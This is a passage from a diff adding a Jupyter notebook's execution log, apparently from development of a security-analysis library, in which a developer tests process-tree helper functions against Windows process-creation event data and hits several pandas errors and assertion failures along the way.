\u001b[0mint\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36mxs\u001b[1;34m(self, key, axis, level, drop_level)\u001b[0m\n\u001b[0;32m   3735\u001b[0m             \u001b[0mloc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mnew_index\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc_level\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mdrop_level\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mdrop_level\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   3736\u001b[0m         \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 3737\u001b[1;33m             \u001b[0mloc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   3738\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   3739\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mnp\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndarray\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m   2897\u001b[0m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2898\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2899\u001b[1;33m                 \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_maybe_cast_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   2900\u001b[0m         \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmethod\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mmethod\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mtolerance\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mtolerance\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   2901\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndim\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msize\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n",
+        "\u001b[1;31mKeyError\u001b[0m: '11'"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_process(p_tree, \"11\")"
+    },
+    "executionTime": "2019-12-13T20:48:44.242Z"
+   },
+   {
+    "cell": {
+     "executionCount": 19,
+     "executionEventId": "e2ecfaff-1127-4a28-9513-330ab50691cc",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                          WORKGROUP\\MSTICAlertsWin1$\nEventID                                                                4688\nTimeGenerated                                    2019-02-09 21:02:56.273000\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                     S-1-5-18\nSubjectUserName                                            MSTICAlertsWin1$\nSubjectDomainName                                                 WORKGROUP\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                         0x183c\nNewProcessName                              C:\\Windows\\System32\\conhost.exe\nTokenElevationType                                                   %%1936\nProcessId                                                             0x8dc\nCommandLine               \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...\nParentProcessName         C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId                                                           0x0\nSourceComputerId                       263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc                                   2019-02-09 21:02:56.273000\nEffectiveLogonId                                                      0x3e7\nnew_process_lc                              c:\\windows\\system32\\conhost.exe\nparent_proc_lc            c:\\program files\\microsoft monitoring agent\\ag...\nsource_index                                                             11\nNewProcessId_par                                                      0x8dc\nEffectiveLogonId_par                                                  0x3e7\nnew_process_lc_par        c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par                                                        998\nProcessId_par                                                         0x864\nNewProcessName_par        C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTimeGenerated_orig_par                        2019-02-09 21:02:56.256999936\nparent_key                c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot                                                                False\nIsLeaf                                                                 True\nIsBranch                                                              False\npath                                                             1004/10/11\nparent_index                                                             10\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: object"
+       },
+       "execution_count": 19,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_process(p_tree, \"c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000\")"
+    },
+    "executionTime": "2019-12-13T20:49:36.248Z"
+   },
+   {
+    "cell": {
+     "executionCount": 20,
+     "executionEventId": "6f81e08c-2c9d-45f1-99a6-3346fa42b71d",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "Index(['TenantId', 'Account', 'EventID', 'TimeGenerated', 'Computer',\n       'SubjectUserSid', 'SubjectUserName', 'SubjectDomainName',\n       'SubjectLogonId', 'NewProcessId', 'NewProcessName',\n       'TokenElevationType', 'ProcessId', 'CommandLine', 'ParentProcessName',\n       'TargetLogonId', 'SourceComputerId', 'TimeCreatedUtc',\n       'EffectiveLogonId', 'new_process_lc', 'parent_proc_lc', 'source_index',\n       'NewProcessId_par', 'EffectiveLogonId_par', 'new_process_lc_par',\n       'source_index_par', 'ProcessId_par', 'NewProcessName_par',\n       'TimeGenerated_orig_par', 'parent_key', 'IsRoot', 'IsLeaf', 'IsBranch',\n       'path', 'parent_index'],\n      dtype='object')"
+       },
+       "execution_count": 20,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "bottom_desc.index"
+    },
+    "executionTime": "2019-12-13T20:49:48.682Z"
+   },
+   {
+    "cell": {
+     "executionCount": 21,
+     "executionEventId": "344c1497-13b1-4cf4-b6a9-041d204f6e76",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "bottom_desc.index.name"
+    },
+    "executionTime": "2019-12-13T20:49:52.726Z"
+   },
+   {
+    "cell": {
+     "executionCount": 22,
+     "executionEventId": "070d1f02-0c88-44ee-a678-f1f17f768071",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "'c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000'"
+       },
+       "execution_count": 22,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "bottom_desc.name"
+    },
+    "executionTime": "2019-12-13T20:50:02.613Z"
+   },
+   {
+    "cell": {
+     "executionCount": 23,
+     "executionEventId": "bf9fa044-1f1d-4e25-a870-4127e948d9aa",
+     "hasError": true,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "ename": "TypeError",
+       "evalue": "get_process() missing 1 required positional argument: 'source'",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-23-8eb684db4721>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdesc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mTypeError\u001b[0m: get_process() missing 1 required positional argument: 'source'"
+       ]
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_process(bottom_desc.name) == bottom.desc"
+    },
+    "executionTime": "2019-12-13T20:50:33.997Z"
+   },
+   {
+    "cell": {
+     "executionCount": 24,
+     "executionEventId": "8d0bf554-c623-42f8-b9e3-9f2d4d603f56",
+     "hasError": true,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 'bottom' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-24-d3c68dece999>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdesc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m: name 'bottom' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom.desc"
+    },
+    "executionTime": "2019-12-13T20:50:43.632Z"
+   },
+   {
+    "cell": {
+     "executionCount": 25,
+     "executionEventId": "e459043c-43aa-43db-9918-d5f3ee9a70d6",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                  True\nAccount                   True\nEventID                   True\nTimeGenerated             True\nComputer                  True\nSubjectUserSid            True\nSubjectUserName           True\nSubjectDomainName         True\nSubjectLogonId            True\nNewProcessId              True\nNewProcessName            True\nTokenElevationType        True\nProcessId                 True\nCommandLine               True\nParentProcessName         True\nTargetLogonId             True\nSourceComputerId          True\nTimeCreatedUtc            True\nEffectiveLogonId          True\nnew_process_lc            True\nparent_proc_lc            True\nsource_index              True\nNewProcessId_par          True\nEffectiveLogonId_par      True\nnew_process_lc_par        True\nsource_index_par          True\nProcessId_par             True\nNewProcessName_par        True\nTimeGenerated_orig_par    True\nparent_key                True\nIsRoot                    True\nIsLeaf                    True\nIsBranch                  True\npath                      True\nparent_index              True\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: bool"
+       },
+       "execution_count": 25,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc"
+    },
+    "executionTime": "2019-12-13T20:50:49.760Z"
+   },
+   {
+    "cell": {
+     "executionCount": 26,
+     "executionEventId": "9cb325d3-d9e2-4a2b-a46f-c94570aada5e",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "False"
+       },
+       "execution_count": 26,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_process(p_tree, bottom_desc.name) is bottom_desc"
+    },
+    "executionTime": "2019-12-13T20:50:53.943Z"
+   },
+   {
+    "cell": {
+     "executionCount": 27,
+     "executionEventId": "34ecd42b-993f-4ef3-9388-45178e716d91",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                  True\nAccount                   True\nEventID                   True\nTimeGenerated             True\nComputer                  True\nSubjectUserSid            True\nSubjectUserName           True\nSubjectDomainName         True\nSubjectLogonId            True\nNewProcessId              True\nNewProcessName            True\nTokenElevationType        True\nProcessId                 True\nCommandLine               True\nParentProcessName         True\nTargetLogonId             True\nSourceComputerId          True\nTimeCreatedUtc            True\nEffectiveLogonId          True\nnew_process_lc            True\nparent_proc_lc            True\nsource_index              True\nNewProcessId_par          True\nEffectiveLogonId_par      True\nnew_process_lc_par        True\nsource_index_par          True\nProcessId_par             True\nNewProcessName_par        True\nTimeGenerated_orig_par    True\nparent_key                True\nIsRoot                    True\nIsLeaf                    True\nIsBranch                  True\npath                      True\nparent_index              True\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: bool"
+       },
+       "execution_count": 27,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc"
+    },
+    "executionTime": "2019-12-13T20:51:08.874Z"
+   },
+   {
+    "cell": {
+     "executionCount": 28,
+     "executionEventId": "73ada675-2fc1-45ca-8431-8359923f596e",
+     "hasError": true,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "ename": "ValueError",
+       "evalue": "The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all().",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mValueError\u001b[0m                                Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-28-1dc3d1ad6412>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__nonzero__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1553\u001b[0m             \u001b[1;34m\"The truth value of a {0} is ambiguous. \"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1554\u001b[0m             \"Use a.empty, a.bool(), a.item(), a.any() or a.all().\".format(\n\u001b[1;32m-> 1555\u001b[1;33m                 \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__class__\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__name__\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1556\u001b[0m             )\n\u001b[0;32m   1557\u001b[0m         )\n",
+        "\u001b[1;31mValueError\u001b[0m: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all()."
+       ]
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "assert ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc"
+    },
+    "executionTime": "2019-12-13T20:51:18.085Z"
+   },
+   {
+    "cell": {
+     "executionCount": 29,
+     "executionEventId": "0a70f903-2f48-4b3e-8965-77c95bf4e124",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "assert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()"
+    },
+    "executionTime": "2019-12-13T20:51:50.812Z"
+   },
+   {
+    "cell": {
+     "executionCount": 30,
+     "executionEventId": "33b96e1c-d936-4649-9181-2449f98dee7a",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-30-9faf5212fb44>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     11\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_ancestors\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m3\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     12\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 13\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_parent\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     14\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     15\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert len(ptutil.get_parent(p_tree, bottom_desc)) == 1\nassert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()\nassert (ptutil.get_process(p_tree, bottom_desc) == bottom_desc).all()\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info"
+    },
+    "executionTime": "2019-12-13T20:52:13.634Z"
+   },
+   {
+    "cell": {
+     "executionCount": 31,
+     "executionEventId": "2d965a4c-b0ab-4c6a-9c47-f9d91e9d4906",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                          WORKGROUP\\MSTICAlertsWin1$\nEventID                                                                4688\nTimeGenerated                                    2019-02-09 21:02:56.257000\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                     S-1-5-18\nSubjectUserName                                            MSTICAlertsWin1$\nSubjectDomainName                                                 WORKGROUP\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                          0x8dc\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                   %%1936\nProcessId                                                             0x864\nCommandLine               \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName         C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId                                                           0x0\nSourceComputerId                       263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc                                   2019-02-09 21:02:56.257000\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc            c:\\program files\\microsoft monitoring agent\\ag...\nsource_index                                                             10\nNewProcessId_par                                                      0x864\nEffectiveLogonId_par                                                  0x3e7\nnew_process_lc_par        c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                  1970-01-01 00:00:00\nparent_key                c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot                                                                False\nIsLeaf                                                                False\nIsBranch                                                               True\npath                                                                1004/10\nparent_index                                                           1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000, dtype: object"
+       },
+       "execution_count": 31,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_parent(p_tree, bottom_desc)"
+    },
+    "executionTime": "2019-12-13T20:52:35.787Z"
+   },
+   {
+    "cell": {
+     "executionCount": 32,
+     "executionEventId": "c235ccb0-5529-4118-875d-9be35e4ba4cf",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "(35,)"
+       },
+       "execution_count": 32,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_parent(p_tree, bottom_desc).shape"
+    },
+    "executionTime": "2019-12-13T20:53:09.559Z"
+   },
+   {
+    "cell": {
+     "executionCount": 33,
+     "executionEventId": "40aa6e8f-7262-41c3-aae9-cfcea5c12b1c",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "True"
+       },
+       "execution_count": 33,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)"
+    },
+    "executionTime": "2019-12-13T20:53:30.369Z"
+   },
+   {
+    "cell": {
+     "executionCount": 34,
+     "executionEventId": "706c36ec-09ae-411e-bd55-71a7dd44602c",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "'c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000'"
+       },
+       "execution_count": 34,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.build_process_key(bottom_desc)"
+    },
+    "executionTime": "2019-12-13T20:54:10.207Z"
+   },
+   {
+    "cell": {
+     "executionCount": 35,
+     "executionEventId": "c5d7a3a4-94e1-4749-ab58-f3f142776722",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "True"
+       },
+       "execution_count": 35,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.build_process_key(bottom_desc) == bottom_desc.name"
+    },
+    "executionTime": "2019-12-13T20:54:22.117Z"
+   },
+   {
+    "cell": {
+     "executionCount": 36,
+     "executionEventId": "1383e72b-bdbd-455e-8575-236ddf7b5770",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
